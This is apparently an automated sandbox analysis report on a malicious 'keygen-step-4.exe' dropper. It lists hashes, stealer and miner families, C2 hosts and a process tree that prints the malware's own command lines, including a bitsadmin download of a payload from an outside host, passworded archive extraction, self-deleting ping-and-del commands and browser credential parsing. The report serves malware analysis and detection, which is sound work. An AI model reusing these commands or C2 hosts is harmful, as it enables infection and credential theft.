Resubmissions

24-04-2021 06:39

210424-z9rcb7aepa 10

23-04-2021 19:10

210423-eqazybfbwe 10

23-04-2021 19:10

210423-11yc7me6fe 10

23-04-2021 18:20

210423-96m9f6fxjx 10

23-04-2021 13:38

210423-fv1qhsltzj 10

23-04-2021 13:38

210423-6hhapn6pdx 10

23-04-2021 13:38

210423-m5azl6mq1s 10

23-04-2021 13:38

210423-nlvbxenam6 10

23-04-2021 13:38

210423-y4rkc8l6ts 10

23-04-2021 05:23

210423-lejp16ex1n 10

Analysis

  • max time kernel
    1800s
  • max time network
    1800s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    22-04-2021 17:32

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Extracted

Family

redline

Botnet

бр23.04

C2

redworksite.info:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • ElysiumStealer

    ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • redline 2 IoCs

    redline_Stealer.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 2 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 16 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
  • Suspicious use of SetThreadContext 18 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 5 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 16 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 47 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 11 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2688
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2676
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2560
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2364
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2340
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1916
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1448
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1304
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1228
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1108
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:908
                      • C:\Users\Admin\AppData\Roaming\dtcuhct
                        C:\Users\Admin\AppData\Roaming\dtcuhct
                        2⤵
                        • Suspicious use of SetThreadContext
                        PID:4864
                        • C:\Users\Admin\AppData\Roaming\dtcuhct
                          C:\Users\Admin\AppData\Roaming\dtcuhct
                          3⤵
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:5920
                      • C:\Users\Admin\AppData\Roaming\jucuhct
                        C:\Users\Admin\AppData\Roaming\jucuhct
                        2⤵
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5084
                      • C:\Users\Admin\AppData\Roaming\dtcuhct
                        C:\Users\Admin\AppData\Roaming\dtcuhct
                        2⤵
                        • Suspicious use of SetThreadContext
                        PID:2172
                        • C:\Users\Admin\AppData\Roaming\dtcuhct
                          C:\Users\Admin\AppData\Roaming\dtcuhct
                          3⤵
                          • Checks SCSI registry key(s)
                          PID:1460
                      • C:\Users\Admin\AppData\Roaming\jucuhct
                        C:\Users\Admin\AppData\Roaming\jucuhct
                        2⤵
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5592
                      • C:\Users\Admin\AppData\Roaming\dtcuhct
                        C:\Users\Admin\AppData\Roaming\dtcuhct
                        2⤵
                          PID:2092
                          • C:\Users\Admin\AppData\Roaming\dtcuhct
                            C:\Users\Admin\AppData\Roaming\dtcuhct
                            3⤵
                              PID:6068
                          • C:\Users\Admin\AppData\Roaming\jucuhct
                            C:\Users\Admin\AppData\Roaming\jucuhct
                            2⤵
                              PID:1784
                            • C:\Windows\system32\rundll32.exe
                              C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\WeIhQmrYuBC\WeIhQmrYuBC.dll",WeIhQmrYuBC
                              2⤵
                              • Windows security modification
                              • Drops file in System32 directory
                              • Modifies data under HKEY_USERS
                              PID:4056
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                            1⤵
                              PID:296
                            • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
                              "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
                              1⤵
                              • Checks computer location settings
                              • Suspicious use of WriteProcessMemory
                              PID:512
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetWindowsHookEx
                                • Suspicious use of WriteProcessMemory
                                PID:656
                                • C:\Windows\SysWOW64\rundll32.exe
                                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                  3⤵
                                  • Loads dropped DLL
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of WriteProcessMemory
                                  PID:1596
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:2188
                                • C:\ProgramData\7546723.exe
                                  "C:\ProgramData\7546723.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1504
                                • C:\ProgramData\4013660.exe
                                  "C:\ProgramData\4013660.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  • Suspicious use of WriteProcessMemory
                                  PID:1940
                                  • C:\ProgramData\Windows Host\Windows Host.exe
                                    "C:\ProgramData\Windows Host\Windows Host.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    PID:4116
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:4128
                                • C:\Users\Admin\AppData\Local\Temp\is-EONTN.tmp\Install.tmp
                                  "C:\Users\Admin\AppData\Local\Temp\is-EONTN.tmp\Install.tmp" /SL5="$601B0,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of WriteProcessMemory
                                  PID:4220
                                  • C:\Users\Admin\AppData\Local\Temp\is-N8GFT.tmp\Ultra.exe
                                    "C:\Users\Admin\AppData\Local\Temp\is-N8GFT.tmp\Ultra.exe" /S /UID=burnerch1
                                    4⤵
                                    • Drops file in Drivers directory
                                    • Executes dropped EXE
                                    • Adds Run key to start application
                                    • Suspicious use of WriteProcessMemory
                                    PID:4400
                                    • C:\Program Files\Mozilla Firefox\YQWQHUVGXG\ultramediaburner.exe
                                      "C:\Program Files\Mozilla Firefox\YQWQHUVGXG\ultramediaburner.exe" /VERYSILENT
                                      5⤵
                                      • Executes dropped EXE
                                      • Suspicious use of WriteProcessMemory
                                      PID:4556
                                      • C:\Users\Admin\AppData\Local\Temp\is-7ATCQ.tmp\ultramediaburner.tmp
                                        "C:\Users\Admin\AppData\Local\Temp\is-7ATCQ.tmp\ultramediaburner.tmp" /SL5="$301EE,281924,62464,C:\Program Files\Mozilla Firefox\YQWQHUVGXG\ultramediaburner.exe" /VERYSILENT
                                        6⤵
                                        • Executes dropped EXE
                                        • Drops file in Program Files directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of WriteProcessMemory
                                        PID:4628
                                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                          "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                          7⤵
                                          • Executes dropped EXE
                                          PID:4764
                                    • C:\Users\Admin\AppData\Local\Temp\df-92a5b-a25-d6780-a512abf8efe56\Limevonefy.exe
                                      "C:\Users\Admin\AppData\Local\Temp\df-92a5b-a25-d6780-a512abf8efe56\Limevonefy.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      • Checks computer location settings
                                      PID:4644
                                    • C:\Users\Admin\AppData\Local\Temp\95-d964e-fc8-c1d9c-84bbce62b1e7f\Bugushynuce.exe
                                      "C:\Users\Admin\AppData\Local\Temp\95-d964e-fc8-c1d9c-84bbce62b1e7f\Bugushynuce.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of WriteProcessMemory
                                      PID:4696
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wzth3hjb.cdm\instEU.exe & exit
                                        6⤵
                                          PID:4496
                                          • C:\Users\Admin\AppData\Local\Temp\wzth3hjb.cdm\instEU.exe
                                            C:\Users\Admin\AppData\Local\Temp\wzth3hjb.cdm\instEU.exe
                                            7⤵
                                            • Executes dropped EXE
                                            PID:4400
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zgcjz1d4.2kz\gpooe.exe & exit
                                          6⤵
                                            PID:4492
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cxykinw1.jen\google-game.exe & exit
                                            6⤵
                                              PID:4772
                                              • C:\Users\Admin\AppData\Local\Temp\cxykinw1.jen\google-game.exe
                                                C:\Users\Admin\AppData\Local\Temp\cxykinw1.jen\google-game.exe
                                                7⤵
                                                  PID:5252
                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                    8⤵
                                                    • Loads dropped DLL
                                                    PID:5380
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yrq0ixwz.bsr\skipper.exe /s & exit
                                                6⤵
                                                  PID:5140
                                                  • C:\Users\Admin\AppData\Local\Temp\yrq0ixwz.bsr\skipper.exe
                                                    C:\Users\Admin\AppData\Local\Temp\yrq0ixwz.bsr\skipper.exe /s
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:5536
                                                    • C:\Users\Admin\AppData\Local\Temp\1109008925.exe
                                                      C:\Users\Admin\AppData\Local\Temp\1109008925.exe
                                                      8⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:5656
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                        9⤵
                                                          PID:5268
                                                      • C:\Users\Admin\AppData\Local\Temp\1885692463.exe
                                                        C:\Users\Admin\AppData\Local\Temp\1885692463.exe
                                                        8⤵
                                                        • Executes dropped EXE
                                                        PID:5400
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\yrq0ixwz.bsr\skipper.exe & exit
                                                        8⤵
                                                          PID:4276
                                                          • C:\Windows\SysWOW64\PING.EXE
                                                            ping 0
                                                            9⤵
                                                            • Runs ping.exe
                                                            PID:5764
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nj3x1f1k.jbb\md1_1eaf.exe & exit
                                                      6⤵
                                                        PID:2648
                                                        • C:\Users\Admin\AppData\Local\Temp\nj3x1f1k.jbb\md1_1eaf.exe
                                                          C:\Users\Admin\AppData\Local\Temp\nj3x1f1k.jbb\md1_1eaf.exe
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Checks whether UAC is enabled
                                                          PID:4464
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3e2adb1v.elu\askinstall36.exe & exit
                                                        6⤵
                                                          PID:6068
                                                          • C:\Users\Admin\AppData\Local\Temp\3e2adb1v.elu\askinstall36.exe
                                                            C:\Users\Admin\AppData\Local\Temp\3e2adb1v.elu\askinstall36.exe
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:5428
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd.exe /c taskkill /f /im chrome.exe
                                                              8⤵
                                                                PID:5172
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /f /im chrome.exe
                                                                  9⤵
                                                                  • Kills process with taskkill
                                                                  PID:2160
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kddgvfov.5td\AVUEBSZRXX.exe & exit
                                                            6⤵
                                                              PID:4916
                                                              • C:\Users\Admin\AppData\Local\Temp\kddgvfov.5td\AVUEBSZRXX.exe
                                                                C:\Users\Admin\AppData\Local\Temp\kddgvfov.5td\AVUEBSZRXX.exe
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:6032
                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  PID:3328
                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                                    parse.exe -f json -b firefox
                                                                    9⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    PID:6116
                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                                    parse.exe -f json -b edge
                                                                    9⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    PID:1476
                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                                    parse.exe -f json -b chrome
                                                                    9⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:1836
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\154x4nbk.mwm\y1.exe & exit
                                                              6⤵
                                                                PID:5276
                                                                • C:\Users\Admin\AppData\Local\Temp\154x4nbk.mwm\y1.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\154x4nbk.mwm\y1.exe
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Drops file in Program Files directory
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:5252
                                                                  • C:\Users\Admin\AppData\Local\Temp\yYqM1MQMN3.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\yYqM1MQMN3.exe"
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    • Modifies system certificate store
                                                                    PID:2156
                                                                    • C:\Users\Admin\AppData\Roaming\1619113059212.exe
                                                                      "C:\Users\Admin\AppData\Roaming\1619113059212.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619113059212.txt"
                                                                      9⤵
                                                                        PID:3828
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\yYqM1MQMN3.exe"
                                                                        9⤵
                                                                          PID:3880
                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                            ping 127.0.0.1 -n 3
                                                                            10⤵
                                                                            • Runs ping.exe
                                                                            PID:5388
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mjyd1cwh.wos\ABCbrowser.exe /VERYSILENT & exit
                                                                    6⤵
                                                                      PID:5968
                                                                      • C:\Users\Admin\AppData\Local\Temp\mjyd1cwh.wos\ABCbrowser.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\mjyd1cwh.wos\ABCbrowser.exe /VERYSILENT
                                                                        7⤵
                                                                          PID:1836
                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                            8⤵
                                                                              PID:4996
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bznasbzu.f3h\toolspab1.exe & exit
                                                                          6⤵
                                                                            PID:6120
                                                                            • C:\Users\Admin\AppData\Local\Temp\bznasbzu.f3h\toolspab1.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\bznasbzu.f3h\toolspab1.exe
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:5028
                                                                              • C:\Users\Admin\AppData\Local\Temp\bznasbzu.f3h\toolspab1.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\bznasbzu.f3h\toolspab1.exe
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Checks SCSI registry key(s)
                                                                                • Suspicious behavior: MapViewOfSection
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:4856
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4t4hhvpe.o3d\SunLabsPlayer.exe /S & exit
                                                                            6⤵
                                                                              PID:6044
                                                                              • C:\Users\Admin\AppData\Local\Temp\4t4hhvpe.o3d\SunLabsPlayer.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\4t4hhvpe.o3d\SunLabsPlayer.exe /S
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Drops file in Program Files directory
                                                                                PID:5212
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiC05A.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:5052
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiC05A.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:5504
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiC05A.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                        PID:4172
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiC05A.tmp\tempfile.ps1"
                                                                                        8⤵
                                                                                          PID:4004
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiC05A.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                            PID:5680
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiC05A.tmp\tempfile.ps1"
                                                                                            8⤵
                                                                                              PID:5644
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiC05A.tmp\tempfile.ps1"
                                                                                              8⤵
                                                                                              • Checks for any installed AV software in registry
                                                                                              PID:4772
                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                              "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                              8⤵
                                                                                              • Download via BitsAdmin
                                                                                              PID:808
                                                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -px0ypAyw3wsOiPDD -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                              8⤵
                                                                                              • Drops file in Program Files directory
                                                                                              PID:5376
                                                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pXModaxNw9V0MI8B -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                              8⤵
                                                                                                PID:6124
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiC05A.tmp\tempfile.ps1"
                                                                                                8⤵
                                                                                                  PID:5760
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiC05A.tmp\tempfile.ps1"
                                                                                                  8⤵
                                                                                                    PID:5516
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      9⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:1464
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiC05A.tmp\tempfile.ps1"
                                                                                                    8⤵
                                                                                                      PID:5500
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiC05A.tmp\tempfile.ps1"
                                                                                                      8⤵
                                                                                                        PID:2068
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiC05A.tmp\tempfile.ps1"
                                                                                                        8⤵
                                                                                                        • Blocklisted process makes network request
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:4380
                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\WeIhQmrYuBC\WeIhQmrYuBC.dll" WeIhQmrYuBC
                                                                                                        8⤵
                                                                                                        • Loads dropped DLL
                                                                                                        PID:3500
                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\WeIhQmrYuBC\WeIhQmrYuBC.dll" WeIhQmrYuBC
                                                                                                          9⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • Drops file in System32 directory
                                                                                                          PID:5236
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiC05A.tmp\tempfile.ps1"
                                                                                                        8⤵
                                                                                                          PID:6124
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiC05A.tmp\tempfile.ps1"
                                                                                                          8⤵
                                                                                                            PID:5344
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiC05A.tmp\tempfile.ps1"
                                                                                                            8⤵
                                                                                                              PID:6064
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiC05A.tmp\tempfile.ps1"
                                                                                                              8⤵
                                                                                                                PID:5160
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiC05A.tmp\tempfile.ps1"
                                                                                                                8⤵
                                                                                                                  PID:5888
                                                                                                                • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                  "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                  8⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:2208
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\esxm3v2u.fnd\GcleanerWW.exe /mixone & exit
                                                                                                              6⤵
                                                                                                                PID:5924
                                                                                                              • C:\Windows\System32\cmd.exe
